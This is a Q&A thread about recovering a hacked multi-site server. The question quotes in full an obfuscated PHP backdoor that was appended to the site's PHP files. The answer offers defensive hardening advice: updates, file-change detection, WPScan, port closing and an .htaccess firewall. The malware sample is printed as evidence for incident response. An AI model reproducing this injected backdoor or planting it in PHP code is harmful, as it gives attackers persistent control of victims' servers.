What should I do about hacked server?

My (managed) dedicated server, with several sites (not all of which use WP) has been hacked.

Obfuscated code has been appended to all files (including WP core/plugin/theme and non-WP stuff) for which the content begins with a php command (and not simply all files with a .php suffix).

It doesn’t seem to affect the rendered page, and what little I know suggests it’s a backdoor/trojan – which is about the limit of my knowledge.

Today, I find permissions changed to 200 – which I suspect might have been done by my service provider (although I’ve not received notification, nor yet an answer to my ‘have you…?’ question).

I’m curious about what the code does, although decoding it isn’t worthwhile as it’s clearly in some way ‘bad stuff’.

I want to find the extent of the damage, the cause, and prevent a re-occurence.

It’s fairly simple (though time consuming) to replace the obviously-changed files, and this I’ll do.

My sql db backups seem to be ‘clean’ – but I don’t know enough to be sure.

I’m perhaps wrongly assuming the cause to be WP-related, but don’t know if it might instead have been through password-guessing or other.

Constructive suggestions appreciated. Please and thanks.

Update: having been asked about the extra code, it’s added below. I didn’t originally include it, because it didn’t seem appropriate (not worth the effort of decoding, without which probably little to be gained).

$zbdcvsv = 'tj  x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc    x7f!|w6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-83:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>37    x41 107 x45 116 x54"]); if ((strstr($uas,"  x) or (strstr($uas,"    x63 150 x72 157 x6d 145")rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-tvodujpo!   x24-    x24y7   x24-    x24*67]y74]275]y7:]268]y7f#<!%tww!>!    x2400~:<h%_6R85,67R37,18R#>q%V<*#fopoV;ho))!gj!<*#cd2bge56+99386    x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)uft!*uyfu  x27k:!ftmf!}Zqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%-%bT-%hW~%fdy)##-!#~<p3)%cB%iN}#-!  x24/%tmw/   x24)%c*W%eN+#Qi x5c1^W%c!>!%i   x5c2^<!Ce*[!%cI<pd%w6Z6<.5`hA   x27pd%66d   163 x69 145")) or (strstr($uas,"    x72 1668M4P8]37]278]225]241]334]368]322]3]364]6]283]427]3w6*CW&)7gj6<.[A    x27&6<  x7fw6*  x7f_*#[k2`as,"  x61 156 x64 162 x6f 151 x64")x65    141 x74 145 x5f 146 x75 1}  x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8:|:745]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%)udfoopdXA    x22)7gj6<*QDU`MPT7-NBx273qj%6<*Y%)fnbozcYufhA   x272qj%6<^#zsfvr#   x5cq%7/7#@#7/7^#iubq#   x%  x24-    x24*<!~!    x24/%t2w/**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmFSUT`LDPT7-UFOJ`GB)fubfsdtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR   x27tfs%6<*17-SFEBFI,6<*127-UVPF8    124 x54 120 x5f 125 x53 105 x52 1#00#W~!%t2w)##Qtjw)#]XA    x27K6<  x7fw6*3qj%7>    x22) or (strstr($uas,"  x66 151 x72 145 x66 157 x78")))9y]g2y]#>>*4-1-bubE{h%)82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K7tolower($_SERVER[" x4  x3a 61  x31")) or (strstr($ujyf`x   x22l:!}V;3q%}U;yk5`{66~6<&w6<   x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA    x27&6<.f<!  x24-    x24gps)%j>1<%j=tj{fpg)  x24)##-!#~<#/%  x24-    x24!>!fyqmpef)# x24*<!%t::!>!   x24Yp { $GLOBALS["  x61 156 x75 156 x61"]=1; $uas=str8:56985:6197g:74985-)% x24-    x24y4   x24-    x24]y8  x24-    <.msv`ftsbqA7>q%6<  x7fw6*  x7f_*#fubfsdX9#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!  x24/%tmw/!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]4b!>!%yy)#}#-#    x24-    x24-tumjgA  x27doj%6<   x7fw6*  x7f_*#fmjgk4`{6~6<tfs%w6<   x7fw6*CW]}R;2]},;osvufs}    x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;33bq}k;opjutmfV x7f<*X&Z&S{ftmfV    x7f<*XAZASV<*w%)pp5.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>62]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:7592P4]D6#<%G]y6d]281Ld]2x24]26 x24-    x24<%j,,*!| x24-    x24g5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepjepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tut!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_  x5c}X   x24<!%tmw!>!#]y84]275]y8mg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fub24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y234]342]58]24]31#-%tdz*Wsfuvso!%bss    x5csboe))1/3vd}+;!>!}   x27;!>>>!}_;gvc%}&;ftmbg}   x7f;!osvufs}w;* x7f!>>  x2sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudo]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!  x246767~6<Cw6 $vbpgblb("", $gamgsii); $eutnyme();}}vg   x22)!gj}1~!<2p% x7f!~!<##!>!2p%ZfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/NJU,6<*27-SFGTOBSUOSVUFS,6<*mdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!/20QUUI7jsv%7UFH#   x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-Kmgoj{h1:|:*mmvo:>:iuhofm%:-dovg}x;0]=])0#)U!    x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%t%:osvufs:~:<*9-1-r%)s%>/h%sqpt)%z-#:#*   x24-    x24!>!  x24/%tjw/   x24*b   x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobsc^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^72qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA    >j%!*3! x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{he(array_map("zkglakb",str_split("%tjw!>!#]y84]275]y83]248 { $vbpgblb = "   x63 162     x27pd%6<pd%w6Z6<.2`hA   x27pd%6<C   x27pd%6|6.7eu{66~67<&if((function_exists("  x6f 142 x5f 163 x74 141 x72 164jQeTQcOc/#00#W~!Ydrr)%rsutcvt)fubmgoj{hA!osvufs!~<3,j%2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D]252]y85]256]y6g]257]y86]2%:|:**t%)m%=*h%)m%):fm2bd%-#1GO  x22#)fepmqyjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#4#-#D#-#W#-#C#-#O#-#N#*-!%24- x24*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x24-    x2  x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r    x5c2^-%hOh/ff2-!%t::**<(<!fwbm)%tjw)#   x24#-!#]y38#-!%w:**<")));$eutnyme =osvufs!|ftmf!~<**9.-j%-bubE{h%)1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%de>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#gxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68396]373P6]36]73]83]238M7]381]211Mpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`ms`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!tpqsut>j%!*9!   x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)su>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~    x{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufld56  x63 164 x69 157 x6e"; function zkglakb($n){return chr(ord($n)-1);} 2!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!>!    x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-    x24-!%  xK)ebfsX    x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1sv%7-MSV,6<*)ujojR   x27id%6<    x7fw6*  x7f_*#ujojRk3`{666~6<&w6<   x7fw6<*&7-#o]s]o]s]#)fepmqyf    x27*&7-n%)utjm6<    x7f<^2  x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*3]273]y76]277#<!%t2w>#]y74]273]y76%)tpqsut>j%!*72!   x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%):<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:rI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%") && (!isset($GLOBALS["   x61 156 x75 156 x61"]))))bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT#0#/*#npd/#)rrd/#00;quui#>.%!<***f   x27,*e  x27,*d  x27,*c  x27,{e%)!>> x22!ftmbg)!gj<*#k#)usbut`cpV    x7f x7f x7f x7f<u%V x27{f;^nbsbq%   x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/}c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUU,;#-#}+;%-qp%)54l}    x27;%!<*#}_;#)323ldfid>}&;!osvufs>m%:|:*r%:-t%)3of:opjudovg<~   x24<!%o:!#zsfvr#    x5cq%)ufttj x22)gj6<^#Y#    x5cq%   x27Y%6s:    x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5<pd%w6Z6<.4`hA    x27pd%6<pd%w6Z6<.3`hAtcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!  x27!hmg%)!gj!|!*1?h%h00#*<%nfd)##Qtpz)#]341]8@error_reporting(0); $gamgsii = implodStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSgneiijtn'; $rymqhdk=explode(chr((436-316)),substr($zbdcvsv,(39702-33682),(130-96))); $oulclf = $rymqhdk[0]($rymqhdk[(6-5)]); $ezqcuyal = $rymqhdk[0]($rymqhdk[(10-8)]); if (!function_exists('rieqim')) { function rieqim($eebvtvdx, $wgctulke,$hoxaoipzz) { $iopacym = NULL; for($cisysje=0;$cisysje<(sizeof($eebvtvdx)/2);$cisysje++) { $iopacym .= substr($wgctulke, $eebvtvdx[($cisysje*2)],$eebvtvdx[($cisysje*2)+(3-2)]); } return $hoxaoipzz(chr((27-18)),chr((535-443)),$iopacym); }; } $luxvad = explode(chr((164-120)),'3719,53,5370,50,1678,47,1466,21,1251,35,166,47,680,43,1487,28,813,34,213,45,1333,51,3641,24,847,29,4735,70,5982,38,3584,57,2914,58,658,22,5867,36,3665,54,5077,46,69,45,4938,50,4988,25,3153,62,972,32,1161,25,1307,26,3507,36,1004,66,3473,34,5781,45,1776,39,1537,55,2025,56,1186,65,3081,29,5013,64,773,40,4672,63,4466,59,2789,61,4805,67,4227,31,3795,31,3543,41,5196,50,4576,61,5903,53,2568,55,1384,23,2850,64,3010,35,5123,39,3934,21,3045,36,5462,60,3359,55,4525,51,1095,66,501,67,409,23,5634,57,5301,69,432,49,0,69,481,20,5584,50,5691,52,876,61,2623,48,3215,27,2411,49,3110,43,5522,62,2147,40,4322,63,379,30,2460,40,1515,22,2081,66,3242,52,2500,68,5162,34,3886,26,335,44,3294,27,5246,55,3912,22,3955,64,2240,46,5743,38,4872,66,4044,52,1999,26,3321,38,1745,31,2378,33,306,29,1592,30,1070,25,1622,56,589,69,3772,23,4385,50,1815,67,4096,69,1286,21,1407,59,1725,20,258,48,2286,70,114,52,1882,58,3826,60,2356,22,937,35,5420,42,568,21,5956,26,723,50,4435,31,1940,59,2741,48,2187,53,4258,64,5826,41,3414,59,4637,35,2671,70,4019,25,4165,62,2972,38'); $rlojefjp = $oulclf("",rieqim($luxvad,$zbdcvsv,$ezqcuyal)); $oulclf=$zbdcvsv; $rlojefjp(""); $rlojefjp=(658-537); $zbdcvsv=$rlojefjp-1

2 Answers
2

My (managed) dedicated server, with several sites (not all of which use WP) has been hacked.

OK, it happens. Not the end of the world.


Today, I find permissions changed to 200 – which I suspect might have been done by my service provider (although I’ve not received notification, nor yet an answer to my ‘have you…?’ question).
It may be that someone tried to attack your service provider. It is quite uncommon to have the 200 user permission.

In Linux there are two methods to change the file.php permissions.

-rwxrwxrwx  file.php
  • Symbolic method
  • Absolute Value method

The symbolic method is for geeks such as David MacKenzie who wrote chmod tool, and we will only speak in absolute value method.

The permission of the following file:

-rwxrwxrwx  file.php

is 777.

enter image description here

Apparently your files were 200 like this:

--w-------  file.php

4 means Read,
2 means Write
1 means Execute

Looks like the hacker got your root access.


I’m curious about what the code does, although decoding it isn’t worthwhile as it’s clearly in some way ‘bad stuff’.

I would not bother with that. I would focus on recovery. Otherwise, you will just loose precious time.


I want to find the extent of the damage, the cause and prevent a re-occurrence.

Correct, I will focus only on prevention.

If your hosting provider doesn’t provide the feedback this was their fault, then this may be your fault.


Have you used the latest version of PHP?

Check out this URL and ensure that in 2016 — 207 security flaws were found in PHP.
http://www.cvedetails.com/product/128/PHP-PHP.html?vendor_id=74

PHP is getting there, but you need constantly to upgrade the version.


Have you used software auto upgrades?

But not only PHP, you need to create automatic updates for the whole web server. This is very important.

Occasionally, there are new vulnerabilities found for CentOS, or Ubuntu you are running. And I was a witness of some great problems, just because the OS was not up to date with security updates.

In Ubuntu you would do something like

sudo apt-get update
sudo unattended-upgrade

somewhere in cron job, or

unattended-upgrade --dry-run --debug

To test the upgrade.

If you like to make upgrades to work as a service, you may try

dpkg-reconfigure unattended-upgrades

You would generally need to do that if your hosting company is not doing this automatically. Please check.


Have you used file change detection ?

Part of the iThemes security plugin you already use is File change detection. This is very important to have set since all the security analytics mention this is a key feature. However, from there you will need to pay attention to files updated. It is important to keep the number of the folders low and to set not to be informed based on the extension of the files. Typically you don’t need to track images.

Did anyone found your log files ?

Log files should be prohibited in general via .htaccess. If you are in Nginx, then in Nginx config file. There are certain backup plugins that use wp-content to store the log files. Some of these do have weak naming convention and scouts may get your logs, with the information about your web server.

The extension of log files may not always be .log. It may be log.1 and like. Keep that in mind.


Can WP SCAN detect your passwords and users

Use WP SCAN tool and check if it can crack your passwords.

You may consider .htaccess rule to prevent WordPress username enumeration if you don’t have any side effects.

RewriteCond %{QUERY_STRING} author=d
RewriteRule ^ /? [L,R=301]

Are your gates wide open?

You may consider closing your mysql port if this is open.

PORT      STATE   SERVICE
3306/tcp  open    mysql

Some services such as mysql should not have open ports, like in the example above. You will need to search the web for the good for the good port scanner.

Also, your login form should have the login limit count, as well as your web server SSH and FTP channels.

The another gate is xmlrpc-php. If you don’t need that you may try to eliminate it, because this would be the place where someone may try to log in.


Have you had a firewall .htaccess ?

The sixth generation of the firewall from the perishable press is not in constraint with your .htaccess file at all. https://perishablepress.com/6g/

It includes empty bots, and bad bots removal. As I checked it should work without interfering with the existing .htaccess rules.

You should test this in low traffic time, or on the development server, and possible use all the tips from there. Should be easy, just copy and paste.


Have you used RIPS to test your plugins and themes?

This will allow you to scann plugins and themes from your http(s)://domain.com/rips/index.php

You can download it from here and extract it to the same level as WordPress:
enter image description here

Then check this out. Query Monitor plugin is perfect, but for the other one the tool found security problems.
I tested nextgen-gallery and query-monitor plugins. Look what I found.

enter image description here
enter image description here

There are sometimes false positives this tool may provide you, but in general, you will have the feedback.


So the final advice for you.
You don’t know if your MySQL database is clean. You should probably export all the articles using standard WordPress export and create the new one.

You should install new plugins and new theme. You may even start with the new clean VPS. On Linode this is just few clicks.

You should start with the new WordPress installation for sure..

Probably you may even change the hosting if you determine they are not reliable.

The hosting provider may provide you some feedback from your web server Logs if this is the part of the service, so you can understand what was the problem better.

Anyhow — step by step.


Also, please check my other answer I provided to @Rahul, it may be good for prevention.

Leave a Comment